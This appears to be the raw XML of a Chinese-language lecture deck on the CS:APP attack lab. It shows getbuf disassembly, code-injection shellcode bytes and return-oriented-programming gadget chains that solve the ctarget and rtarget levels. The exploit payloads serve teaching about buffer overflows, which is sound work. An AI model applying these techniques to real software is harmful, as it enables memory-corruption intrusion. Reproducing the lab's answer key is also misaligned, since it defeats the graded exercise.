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19"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId20"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2271" r:id="rId3"/>
    <p:sldId id="2324" r:id="rId4"/>
    <p:sldId id="2356" r:id="rId5"/>
    <p:sldId id="2355" r:id="rId6"/>
    <p:sldId id="2350" r:id="rId7"/>
    <p:sldId id="2357" r:id="rId8"/>
    <p:sldId id="2332" r:id="rId9"/>
    <p:sldId id="2359" r:id="rId10"/>
    <p:sldId id="2329" r:id="rId11"/>
    <p:sldId id="2360" r:id="rId12"/>
    <p:sldId id="2336" r:id="rId13"/>
    <p:sldId id="2333" r:id="rId14"/>
    <p:sldId id="2363" r:id="rId15"/>
    <p:sldId id="2364" r:id="rId16"/>
    <p:sldId id="2362" r:id="rId17"/>
    <p:sldId id="2361" r:id="rId18"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6815138" cy="9931400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId21"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
      <p:regular r:id="rId22"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId23"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="楷体" panose="02010609060101010101" pitchFamily="49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</p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId27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99"/>
    <a:srgbClr val="66FF66"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FF99FF"/>
    <a:srgbClr val="86BC64"/>
    <a:srgbClr val="0E706E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87772" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="380" y="52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2024/6/10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2024/6/10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2024/6/10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2024/6/10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2024/6/10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2024/6/10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2024/6/10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2024/6/10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2024/6/10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77348" cy="5040312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数的功能是从标准输入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）读入一个字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>函数源程序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 err="1"/>
              <a:t>bufbomb.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>里没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据反汇编逆向）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5132" y="2996952"/>
            <a:ext cx="8468220" cy="345638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0000000000401de1 &lt;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401de1:	f3 0f 1e fa          	endbr64 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401de5:	48 83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28          	sub    $0x28,%rsp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401de9:	48 89 e7             	mov    %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401dec:	e8 ad 02 00 00       	call   40209e &lt;Gets&gt;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401df1:	b8 01 00 00 00       	mov    $0x1,%eax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401df6:	48 83 c4 28          	add    $0x28,%rsp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401dfa:	c3                   	ret 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5" y="980728"/>
            <a:ext cx="5976665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CN" dirty="0"/>
              <a:t>/* 'movq $0x5561dcb0,%rdi; ret'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CN" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>48 c7 c7 b0 dc 61 55 c3 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00 00 00 00 00 00 00 00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/* Address of shellcode */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78 dc 61 55 00 00 00 00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/* Address of touch3 */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4c 1f 40 00 00 00 00 00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/* String representation of 0x59b997fa */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35 39 62 39 39 37 66 61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28340" y="1268767"/>
            <a:ext cx="4472009" cy="5112561"/>
            <a:chOff x="2045026" y="1988840"/>
            <a:chExt cx="4306384" cy="3744416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514103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7" y="1988840"/>
              <a:ext cx="2514106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45026" y="4863426"/>
              <a:ext cx="1518861" cy="270497"/>
              <a:chOff x="1986525" y="4162014"/>
              <a:chExt cx="1518861" cy="270497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986525" y="4162014"/>
                <a:ext cx="1518861" cy="27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0x5561dc78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884066" y="44325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500229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[39-32]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7" y="4131436"/>
              <a:ext cx="2500228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7" y="4469444"/>
              <a:ext cx="2514104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514106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c3 55 61 dc 88 c7 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>c7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 48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右大括号 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6104836" y="3147105"/>
              <a:ext cx="246574" cy="1959070"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0D71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77762" y="3480710"/>
              <a:ext cx="250023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rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的值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424001B-4F6E-43EA-9CBF-F62E8BB51418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705614" y="2850242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Touch3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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50491F18-6497-403F-AB47-522894A8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582612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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level3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4A3500A-56E2-4D48-91EF-02ED310A8D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5719552" y="2383670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61 66 37 39 39 62 39 35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153D4F-7BFC-4DEE-BCFF-61FCD67AD1C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4271762" y="2435392"/>
            <a:ext cx="157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0x5561dcb0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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2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623BFC4-4394-4169-94F2-BA37073C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582612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rtarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level2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94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rtarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level2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1EAE2E-E08F-49CD-8EA7-5C2B40806D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="120879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/>
              <a:t>/* Pop to rax */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>4d 20 40 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>/* Stack data = 0x59b997fa */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> fa 97 b9 59 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>/* Move from rax to rdi */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 42 20 40 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>/* Call target function */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 2f 1e 40 00 00 00 00 00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452A9F-C4EA-4BD0-AA6D-0F36E297F5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5032181" y="1268767"/>
            <a:ext cx="3651171" cy="5112561"/>
            <a:chOff x="2915393" y="1988840"/>
            <a:chExt cx="3515947" cy="374441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60D12E4-6604-4170-840E-E2C42BD8DEBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="3495936"/>
              <a:ext cx="2514103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3E81CC-1517-4F81-8E2E-83A41BC1D712}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="1988840"/>
              <a:ext cx="2514106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A81D2BE-9477-43A7-917F-1FD7F7420308}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2915393" y="4871857"/>
              <a:ext cx="621649" cy="270497"/>
              <a:chOff x="2856892" y="4170445"/>
              <a:chExt cx="621649" cy="270497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E1EB969-9A36-4811-8533-F6A2B49467CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2856892" y="4170445"/>
                <a:ext cx="621649" cy="27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2960520-FF27-4AB9-A458-422D334E75F3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2884066" y="44325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74C77F6-CC52-4ABD-A29E-CF95E9D9932D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="3825587"/>
              <a:ext cx="2500229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[39-32]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36F860-1DC6-4B90-9F36-AF6081714DB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="4131436"/>
              <a:ext cx="2500228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AC0D62B-9359-45DB-9A19-BA8048265947}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="4469444"/>
              <a:ext cx="2514104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2D52393-2406-4F21-92D6-1F9934E7C049}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="4795369"/>
              <a:ext cx="2514106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8A085E33-BC20-4426-A9D4-F920BDA8F21A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6104836" y="2484721"/>
              <a:ext cx="326504" cy="2621454"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0D71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8A1F3AE-4A27-4532-B8A2-33B20AFE9222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3577762" y="3480710"/>
              <a:ext cx="250023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40204d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96A4500-106C-4625-AD76-4F252B79E80A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724697" y="514721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i="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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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[7-0]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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5E8108-5245-4236-9010-109987B41649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720024" y="2834469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cookie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B13DFB-09FA-469F-B2E6-EEFBDBF63B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733964" y="2387307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402042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743136-E5AC-45CF-AAEB-69D214719EA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726995" y="1945834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Touch2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill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9556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DDA54-66D0-43B6-B315-6D67DDB9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49" y="1322377"/>
            <a:ext cx="8218488" cy="145201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pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rax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retq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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rdi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retq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9D692-9BB0-4E22-8B9A-D7407B091C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300840-48DB-402C-B440-9452117AC3AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430949" y="3156791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objdump -d tt1.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="da-DK" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" dirty="0"/>
              <a:t>    0:	58                   	pop    %rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" dirty="0"/>
              <a:t>   1:	c3                   	ret    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" dirty="0"/>
              <a:t>   2:	48 89 c7             	mov    %rax,%rdi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" dirty="0"/>
              <a:t>   5:	c3                   	ret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2BD239-7E01-4346-A2AD-657730FF186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178091" y="278092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gcc -c -o tt1.o  tt1.s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F1DEB7-8520-4B52-AB20-7411BAD48323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="109270" y="905540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tt1.s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4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38024-72FC-46F9-807D-FC815D86B2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54219" y="3613818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03BE33-0FDB-4C6A-B2F7-A594C27E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3" y="3933056"/>
            <a:ext cx="7954485" cy="905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09DADA-E1D0-4007-A50B-B8688523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76872"/>
            <a:ext cx="8059275" cy="7716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388FCBC-8BCE-4CE0-8A4B-55789D61F13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1207655"/>
            <a:ext cx="231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3.objdump –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rtarget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9F6362-DC4E-4CD4-8385-23EC70A9F83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780999" y="2564904"/>
            <a:ext cx="998913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7248144-D8C0-4956-9273-32B03BDCF148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780999" y="4581128"/>
            <a:ext cx="157101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B3EF8B3-12F8-4D83-A3E4-88DA10471DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="4725144"/>
            <a:ext cx="57606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6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rtarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level3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40110" y="6261228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1EAE2E-E08F-49CD-8EA7-5C2B40806D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134722" y="707743"/>
            <a:ext cx="623747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00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4d 20 40 00 00 00 00 00    * Pop to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20 00 00 00 00 00 00 00    * Stack data = 0x20 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0b 21 40 00 00 00 00 00      /* Move from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4a 21 40 00 00 00 00 00        /* Move from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> e0 20 40 00 00 00 00 00    /* Move from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */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</a:rPr>
              <a:t>ab 20 40 00 00 00 00 00      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/* Move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>42 20 40 00 00 00 00 00      /* Move from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/* Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsi+rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to get address for string in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 5f 20 40 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>42 20 40 00 00 00 00 00   /* Move address from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4c 1f 40 00 00 00 00 00    /* Call target function */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/* String representation of cookie */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 35 39 62 39 39 37 66 61 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
